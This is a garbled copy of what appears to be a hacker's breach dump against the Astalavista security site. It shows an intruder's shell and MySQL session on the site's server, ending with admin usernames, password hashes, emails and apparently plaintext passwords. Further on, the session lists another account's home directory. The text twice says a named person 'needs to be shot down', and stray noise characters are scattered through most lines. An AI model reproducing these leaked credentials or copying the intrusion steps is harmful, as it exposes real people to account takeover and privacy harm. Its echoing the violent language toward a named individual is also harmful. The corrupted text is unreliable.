<title>ASTALAVISTA.com - Exploits</title>
6 @, b) r( p( |9 H <link>http://www.astalavista.com/exploits</link>
M; C/ h2 v9 u+ R. W8 ? <description>All availably Exploits.</description>
6 Z( v* l- \/ {. v5 M' u0 @3 x <language>en-us</language>
$ y4 U. s! d* A7 R2 X <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
7 V5 Q L4 D5 m9 m4 A9 t ` <docs>http://blogs.law.harvard.edu/tech/rss</docs>
4 y; w t6 T7 S7 K1 k <generator>Astalavista.com</generator>4 r: ^ r- Q5 {8 v3 N. [
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
i. J3 B [% x/ F7 g: {% t* G </channel>
% U. h% x' X+ T v: |" X</rss>’;
: j/ K8 \% G$ b3 K4 }7 H
( d8 M( g* N/ K0 b7 p if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
( x' |/ S# a: V2 W9 ]" q% b unlink (FULLPATH . ‘/feed/exploits.xml’);
# h) ?& c8 F$ O5 w: ^ }
# s! i6 R; V/ z+ k7 H" K' b- ^/ \6 w* l- e2 c! d
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
7 u8 w$ A/ ~ J @* Q2 N[snip]
' E, r! u, v7 `* @+ Z
# c9 U& n) ^' Zsh-3.2$ cat exploits.sh
s2 E5 M9 a l5 H( j#!/bin/sh
0 T7 G7 R* Z) I$ T. N
3 `' E6 i) _% R8 ]7 c. ]+ j8 {: A###########################################################& U9 E% P0 G3 X/ q% W
# #
$ x- b) }' X- A/ t( g# J# Title: milw0rm exploits adder #
3 L0 D. g* q) C n+ a: I# Description: Add all milw0rm exploits to the #- ^2 C" b) A3 G% z1 P U# N
# Astalavista.com database #0 j) {0 S2 k. l9 B
# #
: |# h& C: D, g0 @# Company: Astalavista Group #
- Y6 S3 ~ x" L" H# Author: Paulo M. Santos #
4 |7 M& D$ I' f/ b# E-Mail: 链接标记paulo.santos@astalavista.ch #
+ Y% [! G. I$ Q* g( b! W# #; ^; M1 |$ |! ] t3 C
###########################################################- b/ x, D8 {) B
7 n! p: x8 E2 K# W8 _; A
# path
4 W% s! v& _1 n+ g& H* y" \) D1 ~) C2 mthis_path=/home/com/public_html/modifications/cronjobs
3 ^7 }+ n6 P: d9 Q! z' P) j6 d I4 B5 s3 N
# change directory
1 _' L' Z4 s# [* I3 K# Scd $this_path
: H" l- h8 t0 dcd tmp/, u, I) j, q+ |; {/ B
! R0 v+ u" y; Q6 m; ?) z
# delete files
$ m2 H* A( {1 F' I" R: j, hrm -rf milw0rm.tar.* &
3 K/ o0 X( L3 Qrm -rf milw0rm/ &6 V: Y- b2 G# R
2 p4 Z. @+ {7 `- M5 _' Q$ f
# wget milw0rm paket
5 z" Y; a; y+ X6 Twget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
: o- }# {! u/ t. z
* M# E4 @ O4 _, Q1 m# extract milw0rm paket
. O' \: j& O& Wtar -xvf milw0rm.tar.bz2
/ a4 v9 h4 E6 u' z! ]. I+ \# \
7 O- t6 T* _; v# change owner
! a' c3 _& Q% W( S2 Schown -R com .
' s2 |$ x9 ^( C+ xchgrp -R com .. f& C( T' X5 w. O
# r7 ]2 F( [) b" S0 s
# execute php script" q# [2 p3 f3 j3 u& o
cd $this_path
" v h" y3 O* _3 O. Wphp -q exploits.php }: u% a. O8 @7 @& V
6 i& R/ e- m) a; S1 z: ^
# delete files
6 v3 P7 X: Q1 x5 crm -rf tmp/milw0rm.tar.*
) D7 b& R9 H7 |1 B8 Lrm -rf tmp/milw0rm/
( `$ L$ a+ ^2 G
5 U }6 c* x/ V' X& c, tsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
6 B% x2 U. Z7 J- f/ zPaulo M. Santos needs to be shot down.
6 u2 _! l+ G' Q( A. w3 W) M' k1 x/ a
mysql -u contrexxuser2 -p$ K, l; C5 |2 k! W7 D
Enter password:
+ Q3 ?, z# z' e; o/ g) ]Welcome to the MySQL monitor. Commands end with ; or \g.1 e8 b1 d Y0 M
Your MySQL connection id is 261694
$ t+ d V1 \- q3 nServer version: 5.0.45-community-log MySQL Community Edition (GPL)
- e3 u z/ H1 k. Q' I0 t; U9 p/ I" u: N6 n: N
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
2 k1 X& t! g2 l9 A7 H* i. w' h
mysql> show databases;: ~. f* `6 T4 q# L& F
+——————–+, T' b1 G# }& _
| Database |
9 C, I9 x: P; e0 g. Y+——————–+3 o/ \; K9 ~1 S8 l% Y! Q) m
| information_schema |! D$ k$ K0 ]2 ?+ C$ h1 |
| com_contrexx2 |
1 f; e. l0 \3 O( d. O| com_contrexx2_live |8 R4 W( P2 f. s" L/ N
| test |
1 |! _. i: g) J( n6 H8 N& t+——————–+
. M* G4 E: `1 B# J8 M( q% i4 rows in set (0.00 sec)5 N. ^: Z2 t2 u7 ~
5 d: _1 o8 ?3 R9 U7 G
mysql> use com_contrexx2_live
, w7 ~# N; H+ j) XDatabase changed4 ^7 L( R K* p' J
mysql> show tables;
1 e* E& s9 S7 C7 L9 V! ~. ~+————————————————–+. c: i. L4 [9 Y; {2 r. D
| Tables_in_com_contrexx2_live |. S$ f/ h1 b2 B, v) T: D
+————————————————–+) S7 \+ V' N' f+ l
| cc_banner_counter |8 A& P8 g& O$ }
| cc_search_counter |% o% V( Z1 X0 V# u" Y
| contrexx_access_group_dynamic_ids |
/ [: X! K' H- _| contrexx_access_group_static_ids |
H3 |6 x* u6 }% K: L| contrexx_access_rel_user_group |
* E, p J( Y/ w3 _| contrexx_access_settings |& c0 b6 S: i7 [( x6 X) o! e
| contrexx_access_user_attribute |
3 Y) W5 L6 I- n' _* J2 C| contrexx_access_user_attribute_name |
2 z! \/ p6 B% x; k1 e. i, v6 }! f y3 P| contrexx_access_user_attribute_value |7 O& h( S8 ^3 _0 m. j# i9 I3 u4 o
| contrexx_access_user_core_attribute |
0 W) e- P& X' o4 K M| contrexx_access_user_groups |3 I+ w7 F/ ^+ s$ k p
| contrexx_access_user_mail |
/ z2 h/ E: W5 K4 N| contrexx_access_user_profile |
, @+ u" l! `, k" }| contrexx_access_user_title |
% d4 _, d5 V. _| contrexx_access_user_validity |! C% M2 w4 I! R" B# p O! g$ `
| contrexx_access_users |9 f; P% G- _5 Z3 B! ?# s: B
| contrexx_backend_areas |4 Z, `, S5 i- u% T
| contrexx_backups |7 r/ I' ~0 W* }8 M
| contrexx_content |! f4 N: U: S8 i2 n6 R
| contrexx_content_history |
0 ]6 `8 [7 w1 S( w2 @2 b4 C& ?( q| contrexx_content_logfile |# n5 y7 e: v0 Z
| contrexx_content_navigation |9 ?) M+ [9 Z0 P6 T+ f" U, t* o1 R
| contrexx_content_navigation_history |
2 I' W# ^. [. c% A2 U( C| contrexx_ids |
1 d0 W/ ^1 I- t f+ s| contrexx_languages |
6 h" A# H* I& |4 r| contrexx_lib_country |
* y5 t1 l8 z2 P1 h9 U. r; u| contrexx_log |
t1 b# m, E4 H1 n| contrexx_module_alias_source |
( [# m. a6 e7 K( H| contrexx_module_alias_target |
5 n1 Q! N. n, l, L b9 V| contrexx_module_block_blocks |* K& ?" z C2 w
| contrexx_module_block_rel_lang |
2 d/ c6 _8 K) x1 M, L; J# z$ w4 K| contrexx_module_block_rel_pages |2 Y4 h+ _, L% ?
| contrexx_module_block_settings |
5 `: R- O( D) |/ \, Z5 _| contrexx_module_blog_categories |
1 j, r* p1 J% a| contrexx_module_blog_comments |
1 t# p8 @! ^: e3 N5 }| contrexx_module_blog_message_to_category |. q u! @% }( n. u" [! L' I
| contrexx_module_blog_messages |! X- F! H. e, O0 P
| contrexx_module_blog_messages_lang | `8 c" a- y( W: a
| contrexx_module_blog_networks |
* V0 w& A( Y: g0 q| contrexx_module_blog_networks_lang |
1 a8 ]$ @4 d/ `8 [| contrexx_module_blog_settings |7 F5 K/ z9 }# B- \
| contrexx_module_blog_votes |
+ S0 M8 A) m4 G5 y| contrexx_module_calendar |
0 D* O$ J+ r2 @! Z/ { A6 a| contrexx_module_calendar_access |
4 s2 `' k, n- ?) x0 [: k6 @| contrexx_module_calendar_categories |
) o% T j1 w, a! C7 ?| contrexx_module_calendar_form_data |4 z/ `! ?4 s/ ]7 q8 ?+ O; k
| contrexx_module_calendar_form_fields |2 |: t* T% R8 \; B6 W, y
| contrexx_module_calendar_registrations |, _4 P5 D2 H, h6 W7 d; |, f- Q4 ~
| contrexx_module_calendar_settings |
5 f6 g9 L. E6 H S| contrexx_module_calendar_style |6 r V* z) I1 b1 w
| contrexx_module_contact_form |1 H$ _7 P8 F% Y& `
| contrexx_module_contact_form_data |, n3 {! v6 ^, \
| contrexx_module_contact_form_field |
/ _2 u5 k A f; o5 C$ L| contrexx_module_contact_settings |" k) k% L$ ~( ^# k
| contrexx_module_data_categories |
% v" E' G" Y4 ~& ~$ x| contrexx_module_data_message_to_category |! C- l$ I8 {, r& O& C( G- v! x. E
| contrexx_module_data_messages |
# y+ h. y$ X p9 f* Q| contrexx_module_data_messages_lang |% O, G# j6 F$ L p0 D+ f
| contrexx_module_data_placeholders |
( D! Q( e, H" J" B) H| contrexx_module_data_settings |
( S5 I* U5 [, w4 [; u/ r% a| contrexx_module_directory_access |
0 c9 v e0 P4 ^' u" J, b| contrexx_module_directory_categories |4 m9 x$ C+ V. J$ [7 t V% P; I4 I
| contrexx_module_directory_dir |; _5 k6 E, ]1 @) ], z/ w; w
| contrexx_module_directory_inputfields |
7 g; b2 i* R8 _9 @- E4 }. a, ?| contrexx_module_directory_levels |: d& c4 @- z: v( A: T
| contrexx_module_directory_mail |
6 Z+ `, M" `6 d. U/ U3 T" E: h| contrexx_module_directory_rel_dir_cat |# C2 D# X3 V- ~3 Y9 A
| contrexx_module_directory_rel_dir_level |
: k8 G1 r1 X+ ^; S& b. i| contrexx_module_directory_settings |
" Z1 q6 D' E) O) h! U| contrexx_module_directory_settings_google |
9 S' v: Z- T8 V8 G& @2 @! U( R0 t| contrexx_module_directory_vote |5 Y% m V1 P9 Q9 Q2 A
| contrexx_module_docsys |
9 Z, B5 D8 N+ S; i| contrexx_module_docsys_categories |
; ^+ o( C$ `; n- c' @| contrexx_module_egov_configuration |: A9 I" I: T7 a* r; Q; ~8 ]
| contrexx_module_egov_orders |) I$ V1 o; k, Z* E, }3 _8 T2 J
| contrexx_module_egov_product_calendar |
+ \! C0 \7 p) e( ?0 I, A! H! d# i| contrexx_module_egov_product_fields |
\" {+ o' ?+ k2 ]1 @& ]| contrexx_module_egov_products |
- Z a( f5 D* v3 H( W3 q| contrexx_module_egov_settings |) i+ m a' e) A* a+ ]
| contrexx_module_exploits |
" _3 ` A, [0 C, i0 U" F: G: l J4 M$ J2 y| contrexx_module_exploits_categories |
' G9 h4 ~4 ~$ ?1 g| contrexx_module_feed_category |
# _4 ]7 t$ p- L1 |7 U2 `% |6 k| contrexx_module_feed_news |5 r( b( ~7 ?$ b0 ~; n5 i. p* \4 I3 p
| contrexx_module_feed_newsml_association |6 T! J, S1 e& ~ y. ^7 S
| contrexx_module_feed_newsml_categories |& K& J# S# |9 B! j# I" h
| contrexx_module_feed_newsml_documents |+ G, E1 M# M& n# a8 o
| contrexx_module_feed_newsml_providers |2 f7 n2 R; b; [
| contrexx_module_forum_access |
/ g. ^6 t, U% B- l5 n3 x* s| contrexx_module_forum_categories |
* L- v& V8 U& m8 ?) C$ N$ l Z/ i| contrexx_module_forum_categories_lang |2 f7 D/ a0 V+ a3 k- e+ S7 Y, v6 l- q1 m
| contrexx_module_forum_notification |
/ U e( i5 B9 ?# k: ]* D4 y| contrexx_module_forum_postings |
9 _- h `" f) n, G) l| contrexx_module_forum_rating |" j9 k7 K A4 {* H3 Z
| contrexx_module_forum_settings |
# {# _: s" J+ `| contrexx_module_forum_statistics |1 C' o5 I$ S9 Y Q
| contrexx_module_gallery_categories |
5 Z" \5 e, C( ^- R| contrexx_module_gallery_comments |
! k0 K$ U7 Q- U! h" g| contrexx_module_gallery_language |/ p8 w# ?4 s7 v" [, S8 Z: Q; e3 a) X
| contrexx_module_gallery_language_pics |/ W2 g: P. L0 T
| contrexx_module_gallery_pictures |9 j0 b: y( A/ W+ C v0 D9 c0 {
| contrexx_module_gallery_settings |
5 v9 i/ n" [# T7 n6 ^3 j| contrexx_module_gallery_votes |
* k o' p7 H `" N* J) f| contrexx_module_guestbook |1 D; {3 n" J) s
| contrexx_module_guestbook_settings |9 O' M# }% f- N" B; z" s8 _3 t
| contrexx_module_livecam |- `+ u# _+ _( X! [' ?
| contrexx_module_livecam_settings | K- {$ ]; P) Q3 k' D
| contrexx_module_market |6 }1 y! m8 ]. |. V! b3 s! r/ a
| contrexx_module_market_access |
2 B2 H% J5 N! U% g| contrexx_module_market_categories |; }7 k' k m6 K- @
| contrexx_module_market_mail |
" {1 |& |* C* d! K| contrexx_module_market_paypal |
) Y% I; v6 d5 C: I| contrexx_module_market_settings |
- F4 y: ?) n# || contrexx_module_market_spez_fields |
7 [+ w( s9 f/ V2 R8 l, ^| contrexx_module_mediadir_access |
1 [7 P0 i8 R* }( f: Q$ Q| contrexx_module_mediadir_categories |
8 O) _5 S' H! a: C1 O" w| contrexx_module_mediadir_comments |% x v& K5 Q; r1 x. D k( I" P9 ?
| contrexx_module_mediadir_dir |8 R" X U9 U; K
| contrexx_module_mediadir_inputfields |
$ ]# v* t+ [! Y8 ?- c| contrexx_module_mediadir_levels |
" u5 [6 O7 k9 e. D0 ?* u: `| contrexx_module_mediadir_mail |
% U! Q1 U/ _1 B| contrexx_module_mediadir_rel_dir_cat |
B+ y9 ?! o: U6 ?$ m| contrexx_module_mediadir_rel_dir_level |4 M& v5 r0 ^1 `. R' ^5 n: D: t
| contrexx_module_mediadir_reports |4 B) o+ x! v& H$ m( b
| contrexx_module_mediadir_settings |
+ {/ y* N0 \4 d5 k| contrexx_module_mediadir_settings_google | a$ Q/ H* ~, @3 N4 G% W$ _
| contrexx_module_mediadir_vote |; _0 b0 V1 x/ r( ?/ ]
| contrexx_module_memberdir_directories |) x& [3 d! t5 X# X+ q2 l" [; P9 G# B: d
| contrexx_module_memberdir_name |, R+ T) ~2 H5 }. G. l0 Z
| contrexx_module_memberdir_settings |& s. b/ G" y6 h0 h; Z
| contrexx_module_memberdir_values |
8 ~" S- z: w7 V3 H| contrexx_module_nettools_allowed_groups |
* w: N) ^" ~' ^2 m5 D8 K| contrexx_module_nettools_settings |
. W8 d0 \% \! J: e* `6 N" ~| contrexx_module_news |5 g6 D$ y* V! t! p" s1 P* h
| contrexx_module_news_access |
, j' l/ v' d6 d% V; `& L& m4 s. i1 }| contrexx_module_news_categories |
$ c1 {. E1 t! y0 V3 X| contrexx_module_news_settings |
& }; j) S0 X! w3 P| contrexx_module_news_teaser_frame |7 m6 _/ u& r3 j
| contrexx_module_news_teaser_frame_templates |
4 ^" z7 ?) [ E4 p* p& a| contrexx_module_news_ticker |' \- g0 G6 p4 T5 }1 e
| contrexx_module_newsletter |
' a/ e. y' [: x/ G7 f0 N/ r- ]5 p* m| contrexx_module_newsletter_attachment | k0 A7 T2 C/ T1 M6 g3 T8 }( W4 |
| contrexx_module_newsletter_category | O) J4 ^- s. A
| contrexx_module_newsletter_confirm_mail |! j% R7 i8 L# }' b
| contrexx_module_newsletter_rel_cat_news |
( |; u% S7 {" C! {| contrexx_module_newsletter_rel_user_cat |
: @. D, s& T C| contrexx_module_newsletter_settings |/ M ]& S; {* C v; E& k k% n6 X
| contrexx_module_newsletter_template |
& U0 G6 K/ b# r| contrexx_module_newsletter_tmp_sending |
, |+ p' X, h7 h9 K7 U/ G| contrexx_module_newsletter_user |' P% N% v q3 j) R% w5 r$ [
| contrexx_module_newsletter_user_title |
2 i% {3 p: j- m2 J| contrexx_module_onlinetools_defaultports |; ?+ |. }# I& Y9 E
| contrexx_module_onlinetools_defaultports_back |2 k2 d. x$ {, q( n7 W/ }! \
| contrexx_module_onlinetools_geolitecity_blocks |
7 W. O4 L0 a! I+ T| contrexx_module_onlinetools_geolitecity_country |
- b, ~# d# ?, Y8 B( _6 z| contrexx_module_onlinetools_geolitecity_location |
( j$ }2 s2 n' l| contrexx_module_podcast_category |
2 B7 `0 _# D8 x+ u| contrexx_module_podcast_medium |0 u3 o7 B$ Y8 J z' _, q! Q
| contrexx_module_podcast_rel_category_lang |5 K) d! a* Y' o2 K: S
| contrexx_module_podcast_rel_medium_category |5 T1 g2 I6 n6 \0 J8 i
| contrexx_module_podcast_settings |
& }: E& y' V5 i- ?| contrexx_module_podcast_template |
0 @" E: V6 E% `| contrexx_module_proxydb |
2 z: e h' o! s3 j( L1 u| contrexx_module_recommend |
% X8 O0 s* r; N5 ^$ V| contrexx_module_repository |
) c1 l; u9 _) l* a/ H s o| contrexx_module_securitynews_cats |
- U; ^2 c1 U' k% d| contrexx_module_securitynews_feeds |5 d! b9 I& {2 Y. ]
| contrexx_module_securitynews_news | {( |# T7 y) \. ^, L
| contrexx_module_shop_categories |* e9 X5 l) m' C4 O- M H3 I
| contrexx_module_shop_config |! G: p1 B j1 p( o; M N# k/ A# E
| contrexx_module_shop_countries |
4 V! j) B8 ]( g' r% D4 V| contrexx_module_shop_currencies |
8 i0 ?! t$ r9 ]: ^+ W| contrexx_module_shop_customers |) _) |: t; G- n
| contrexx_module_shop_importimg |
6 U7 y) t! q& t$ {; g4 n# [| contrexx_module_shop_lsv |- }. I- E! r& Y1 \2 E- i
| contrexx_module_shop_mail |
( m9 a, ~0 t- N" ]: C) _# T| contrexx_module_shop_mail_content |
1 f& V& N' g; W C' Y| contrexx_module_shop_manufacturer |
. t+ o# E6 X% x* w" F! w| contrexx_module_shop_order_items |' z; h; T Z; C7 a$ \. N5 M
| contrexx_module_shop_order_items_attributes |
6 u/ x0 k) L' d9 M/ f" r2 Y| contrexx_module_shop_orders |( e4 l8 G- V f
| contrexx_module_shop_payment |* u7 I- ?$ P; s! h" m- n0 O
| contrexx_module_shop_payment_processors |
8 ]+ i, P. _: s9 t$ x| contrexx_module_shop_pricelists |
& q9 s& _# g) T; @* ?" u* ^| contrexx_module_shop_products |& G7 Z! ^. z- e! r5 V+ U
| contrexx_module_shop_products_attributes |* r! ]- [* u8 c7 ]
| contrexx_module_shop_products_attributes_name |$ \4 {. Y4 s$ b% y* W# ]. M1 ~
| contrexx_module_shop_products_attributes_value |' p- ]$ O/ P1 x5 i. l3 `6 P
| contrexx_module_shop_products_downloads |
2 W7 G& n8 v1 z$ V9 @/ Z| contrexx_module_shop_rel_countries |5 k5 L# z$ J& r6 M2 y
| contrexx_module_shop_rel_payment |
/ i0 b: ^* v/ Z5 n F. X$ d| contrexx_module_shop_rel_shipment |
6 o" c) |) D& Y5 r: A, ^| contrexx_module_shop_shipment_cost |1 P. Q- o! Z$ ]4 ]
| contrexx_module_shop_shipper |
* F* h% F, ^, W1 t, _- {| contrexx_module_shop_vat |
5 W9 b$ a' K+ x| contrexx_module_shop_zones |/ b" Y* _: m9 X$ N* P
| contrexx_module_u2u_address_list |
K! U( e; W, b& K% h| contrexx_module_u2u_message_log |
9 s* `! u# ^: F) B$ S* n! @3 g| contrexx_module_u2u_sent_messages |) B" k' ?; L8 A% Z% S; \% M
| contrexx_module_u2u_settings |
2 D) d; o( j2 C/ H6 j| contrexx_module_u2u_user_log |8 C5 Q& K5 ]% C9 t0 o: L
| contrexx_modules |
6 [) n5 ]3 Q: O( E( D( H% Q8 p| contrexx_sessions |, R! [$ B+ n. S/ ^! u: B/ X& q7 \
| contrexx_settings |3 F* o* ]. \* t3 g8 o
| contrexx_settings_smtp |$ H$ i% N% a0 [ `0 j8 X' f( [
| contrexx_skins |" q7 [2 M) Y( B4 d- R( M
| contrexx_stats_browser |
! V0 q/ P- o) n| contrexx_stats_colourdepth |8 `, j* F$ {/ N4 \& J! l- A+ C- Y
| contrexx_stats_config |
0 J' \9 \2 _2 J+ r; P2 h| contrexx_stats_country |$ q, g! _. `. }5 ?6 e* m$ i
| contrexx_stats_hostname |
1 x M0 S, i* ]. b| contrexx_stats_javascript |
5 @4 ^! z, U4 T| contrexx_stats_operatingsystem |% G, V8 K% t1 V. b
| contrexx_stats_referer |# O8 R1 g) r% T$ k/ \8 L _
| contrexx_stats_requests |
* o" k+ u( A& C; m6 ?( `| contrexx_stats_requests_summary |+ ^: ~5 s7 m7 ~
| contrexx_stats_screenresolution |
4 Q! X g7 Z8 `/ E/ i- b7 B| contrexx_stats_search |) {! u& _. c) l
| contrexx_stats_spiders |
4 _# J+ ~. |' Z9 j! Q9 H/ |0 o7 I2 x| contrexx_stats_spiders_summary |
7 ]0 [+ i, {2 t2 b3 x9 a| contrexx_stats_visitors |: K( B1 W5 I3 ]! Z1 ]
| contrexx_stats_visitors_summary |: T! J+ w& Y! X6 f( t7 @+ O
| contrexx_voting_additionaldata |! n# _- Y2 t' h
| contrexx_voting_email |
) P3 u) d+ p; ~+ X- v2 A| contrexx_voting_rel_email_system |+ S, r' n0 I3 Q* U/ W. J9 T
| contrexx_voting_results |$ i7 f4 y. h f: G" F
| contrexx_voting_system |
! E! \1 F: m* L' q& P- {( B| foo |
3 z8 f5 t5 Q6 N% Q, ` K1 D+————————————————–+
! V. i, b# {% m1 D4 q+ P227 rows in set (0.01 sec)
# U7 {' G' V0 J+ z$ N8 s; a# w- E' s v6 B& S
mysql> select count(*) as skids from contrexx_access_users;+ G( i; W; k0 R: u3 p
+——-+
. g/ x: c- I1 E. o) h| skids | C2 g+ m# b. d6 {
+——-+
( E2 d3 k: J4 r7 f3 t! F| 53699 |/ |2 Q' ?. E2 {8 h
+——-+( i$ \% F/ i" U/ d& r& Z/ n U1 k
1 row in set (0.00 sec)
5 x0 O. X& X$ K
- \3 i, C+ q/ ~; x9 W. c# }4 Xmysql> describe contrexx_access_users;8 s0 K5 N; ?* n$ ]3 Z! Y
+——————+——————————————+——+—–+————–+—————-+: Y+ b- k/ K% q% m
| Field | Type | Null | Key | Default | Extra |
, f" U* t0 a+ G! ?: b* B+——————+——————————————+——+—–+————–+—————-+
. _( s* X9 k) W2 d& r| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. I% p# j( s0 F5 c! X
| is_admin | tinyint(1) unsigned | NO | | 0 | |
M z! I* y* j0 @& g; e| username | varchar(40) | YES | MUL | NULL | |
" v; g& c% `4 R" j U) _) A7 S| password | varchar(32) | YES | | NULL | | K' t4 |# ^9 S8 L- \ t, C+ m8 u
| regdate | int(14) unsigned | NO | | 0 | |
5 i `! Z( a$ ], L3 ^& ?| expiration | int(14) unsigned | NO | | 0 | | d' N9 E$ c* }& q9 v2 `
| validity | int(10) unsigned | NO | | 0 | |
" |) i! |9 S$ s! _| last_auth | int(14) unsigned | NO | | 0 | |
- a1 b7 F6 M' ^: e R1 F" m+ C; f| last_activity | int(14) unsigned | NO | | 0 | |
! K* ]* a. D7 f- w| email | varchar(255) | YES | | NULL | |
/ i: V" f& y' ~3 Z& t& m3 P# d| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
* s( ~* `: o7 g. S| frontend_lang_id | int(2) unsigned | NO | | 0 | | D2 `+ i5 u4 \ d7 ? Y% `
| backend_lang_id | int(2) unsigned | NO | | 0 | |1 X8 k2 s- W( L! ?) r+ Z8 y( W" n
| active | tinyint(1) | NO | | 0 | |( q# |2 T, s$ |, G# B& Y6 q; H
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
) W/ s" L# Z8 W6 g+ i| restore_key | varchar(32) | NO | | | |. z. _0 R& K* ^, @" p# ]6 ]
| restore_key_time | int(14) unsigned | NO | | 0 | |
- D9 t3 V+ O9 l1 A* F% v9 O) j# Y5 v; o| u2u_active | enum(’0′,’1′) | NO | | 1 | |
I5 I! ~8 |' R+——————+——————————————+——+—–+————–+—————-+! d& V, t9 x; i* }' H: k
18 rows in set (0.00 sec)
3 }3 ?$ ~6 z7 p' n M# U
9 k- p' v* D" z! Lmysql> select username,password,email from contrexx_access_users where is_admin = 1;
) D1 q' h. @. V6 U+ ]+————+———————————-+—————————–+
+ t; L! w: e; Z2 Q3 N) T| username | password | email |
9 C2 M4 f& i* o" N) [1 p+————+———————————-+—————————–+. a3 P* ?8 h0 U4 J
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |6 O) k# Z q: T! B8 v# z. b. B: \
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |9 v$ e4 _# F, q& q( [' H& z
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
+ w7 ]5 ?( H) m& k0 G| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
8 a0 m; M6 R3 M, M+————+———————————-+—————————–+" Q9 F" E4 b3 J- x6 I c* y' B
4 rows in set (0.04 sec)
: B9 z: n* Q5 A2 B) F! R& K& l/ ^) [$ ?2 x8 W1 w
mysql> exit;8 ~9 o; h! M: T1 V: s$ T
Bye
& \& q: H% N% D
6 _" H# z6 q G, z6 s: d) E$ ?$ L[~] There you go, your “team of security and IT professionals” is a joke.0 p7 f. w$ k4 `' ?3 q A4 {; m
* `% {& q5 C ]+——————————+
. b( O& e5 x: [4 M& [; ^system:f82BN3+_*
4 v/ D, W$ W( B* F) o. XBe1er0ph0r:belerophor4astacom
; \- K, h# G* f; k& G% F- d6 Uprozac:asta4cms!' p; j( j. P: i' g
commander:mpbdaagf6m- s6 V- V \/ D; A$ f
sykadul:ak29eral
% l+ C/ E7 h5 m- j3 u+——————————+
( ~1 k) k9 m4 m" E' Y6 Z
: o4 Q( h; s0 Q[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)# S) `& G3 F' a& B! w. m
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.* a1 z+ P2 X2 o/ ?( W8 B
1 T& M0 W! Y) g* U4 Y- Q7 c8 ]# F4 E[~] Lets move to astalavista.net now,: ^. Y8 |* }$ }& k L! |) n9 n
/ v U' M3 `) Q; r5 ~& |
From <链接标记[url]https://www.astalavista.net/[/url]>:
, ^4 n0 p5 g2 ~; a>> Everyone knows that the best defense is a good offense.+ c" |5 K- Z0 u" e: x/ v& J9 _
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.* d; ]" d4 g( U3 K! v% y5 J
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; G! l1 `: _# z
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
, x3 T9 J; I9 X# J
% r. d. V1 b6 Q" X, C0 X( B$ K5 z>> Go ahead, try and hack our server . in a completely legal way!, j- ?% _+ ^6 Y5 p
>> Learn by doing: We offer our members tricky tasks and challenges on an
5 U4 B* {8 j H$ C>> ongoing basis so you can test your knowledge and abilities. You can also3 n4 Y# Y1 o R) m8 K
>> demonstrate what you.ve mastered by taking part in regular hacker contests
1 k2 O! `/ k: L0 `3 x8 J$ Z, o! B' E>> and war games
$ S8 Z+ i/ I$ k( n$ _ W- b7 h! E# H$ o" F4 X% V% \) Q
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
- {4 b) ~8 l1 I* Y1 Z4 q0 O
% _; G% G3 d8 |4 z4 O1 s9 c[-] Tricky task: Find home dir of astalavista.net
( s( y }8 Q2 O, n5 B/ R6 ~: j" o( \3 N. k k
sh-3.2$ ls -la ~astanet
. w' D& ~( O; {. ^5 btotal 48
v9 v2 {, v, H, \drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .. t* _6 e: [! u% z
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' v5 }0 @9 m7 [0 @
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth: h' `* n0 O9 [
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ X' } G3 o+ g5 M) i-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout4 [" z7 g" ^1 ?- x& ^
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
' d9 ]: j4 H! O7 t/ ~2 C-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: K5 | d9 P" E& X' qdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% T/ K# I$ N P: j6 [, Hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
0 n% Y* f+ |9 Q+ ^drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
9 a! O- Y0 I- }lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 B) f- S9 k1 Q% \. I0 ]" p
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
0 R) s7 L8 h7 P
! ~% \- A( L7 X' qsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/2 I" N2 y9 A1 W
sh-3.2$ ls -la4 |3 j- z4 _6 q0 J
total 2005 A0 O% \6 B4 v1 x; o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .6 {2 l. w' l6 H6 ^- {" z
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..4 F$ b5 ]7 {4 Q5 r( @3 f h7 b* v8 r
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0070 R% S* u: @7 h' P4 I
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql- Z: E3 C) ^; \) U" a
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: L4 G; ^5 s- Q0 e0 G
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend0 q4 |7 V5 b# z+ q' D
